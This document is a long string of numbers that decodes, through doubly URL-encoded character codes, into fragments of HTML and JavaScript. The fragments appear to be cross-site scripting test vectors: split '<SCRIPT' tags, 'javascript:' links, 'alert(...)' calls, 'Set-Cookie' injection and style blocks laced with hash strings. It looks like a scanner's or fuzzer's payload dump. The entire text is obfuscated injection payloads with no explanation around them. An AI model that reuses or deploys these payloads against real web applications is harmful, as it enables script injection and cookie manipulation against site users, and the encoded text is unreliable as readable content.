53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,50,51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49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,53,57,37,50,53,50,67,49,50,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,54,53,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,54,37,50,53,50,67,54,53,37,50,53,50,67,56,51,37,50,53,50,67,56,51,37,50,53,50,67,54,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,54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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,57,57,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,54,37,50,53,50,67,55,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,49,50,51,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54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1,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,57,49,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,55,51,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,53,50,37,50,53,50,67,57,51,37,50,53,50,67,54,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,51,37,50,53,50,67,52,53,37,50,53,50,67,52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4,37,50,53,50,67,54,53,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,55,37,50,53,50,67,52,55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7,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,53,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,57,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55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7,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,57,56,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,57,57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1,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,57,55,37,50,53,50,67,52,51,37,50,53,50,67,57,56,37,50,53,50,67,52,51,37,50,53,50,67,57,57,37,50,53,50,67,52,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,49,37,50,53,50,67,53,5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1,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,52,49,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,51,57,37,50,53,50,67,52,49,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,54,51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54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,52,53,37,50,53,50,67,54,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,53,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,51,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,50,37,50,53,50,67,53,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,52,54,37,50,53,50,67,52,56,37,50,53,50,67,52,54,37,50,53,50,67,52,56,37,50,53,50,67,52,54,37,50,53,50,67,52,57,37,50,53,50,67,54,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49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51,56,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55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2,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,49,50,48,37,50,53,50,67,52,56,37,50,53,50,67,54,56,37,50,53,50,67,53,57,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,51,5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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,54,49,37,50,53,50,67,52,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,52,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,54,37,50,53,50,67,52,48,37,50,53,50,67,57,55,37,50,53,50,67,52,54,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,49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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,57,37,50,53,50,67,52,55,37,50,53,50,67,52,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49,49,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,50,37,50,53,50,67,53,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,53,57,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50